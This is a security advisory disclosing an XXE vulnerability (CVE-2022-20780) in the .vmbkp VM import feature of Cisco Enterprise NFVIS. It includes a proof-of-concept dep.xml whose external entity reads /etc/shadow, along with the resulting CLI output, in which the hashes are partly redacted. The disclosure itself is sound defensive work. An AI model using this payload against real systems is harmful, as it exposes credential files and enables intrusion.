Skip to content

Cisco Enterprise NFVIS - XML External Entity Injection Vulnerability (CVE-2022-20780)

High
orange-cert-cc published GHSA-hrpq-384f-vrpg May 6, 2022

Package

NFVIS (Cisco)

Affected versions

4.5.1-FC2

Patched versions

4.7.1

Description

Overview

ENCS has the capability to export VMs. Configurations and metadata are compressed with the VM image in a .vmbkp archive when vmExportAction command is requested.
The vmImportAction command is also available, allowing to import .vmbkp archives.

This import is vulnerable to an XXE allowing to leak system datas to the CLI and probably to the VM.

Details

The vmImportAction is waiting to a .vmbkp archive. This archive is a simple .tar.gz.
It has to be composed of several files. One of them being dep.xml.

dep.xml is a XML configuration file describing the vm_lifecycle.

An attacker can add an external entity into this XML file. This external entity will be resolved by the EncsManager.

Proof of Concept

In this example we inject the external entity in a variable field of a vm_group that should be resolved with /etc/shadow file.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants>
  <tenant>
    <name>admin</name>
      <deployments>
      <deployment>
        <name>ubuntu1</name>
        <vm_group>
          <name>ubuntu1</name>
          ...
          <config_data>
		  ...
            <configuration>
              <dst>user-data</dst>
			  ...
              <variable>
                <name>xxe</name>
                <val>&xxe;</val>
              </variable>
            </configuration>
          </config_data>
        </vm_group>
      </deployment>
      </deployments>
  </tenant>
  </tenants>
  </vm_lifecycle>

It results in /etc/shadow content being displayed in the configuration file.

encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe     
vm_lifecycle tenants tenant admin
 deployments deployment ubuntu1
  vm_group ubuntu1
   config_data configuration user-data
    variable xxe
     val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
    !
   !
  !
 !
!

Solution

Security patch

Upgrade to Cisco Enterprise NFVIS v4.7.1

Workaround

We recommand to disable external entity resolution in XML parser.

References

https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group

Timeline

Date reported: September 16, 2021
Date fixed: May 4, 2022

Severity

High
7.4
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVE ID

CVE-2022-20780

Weaknesses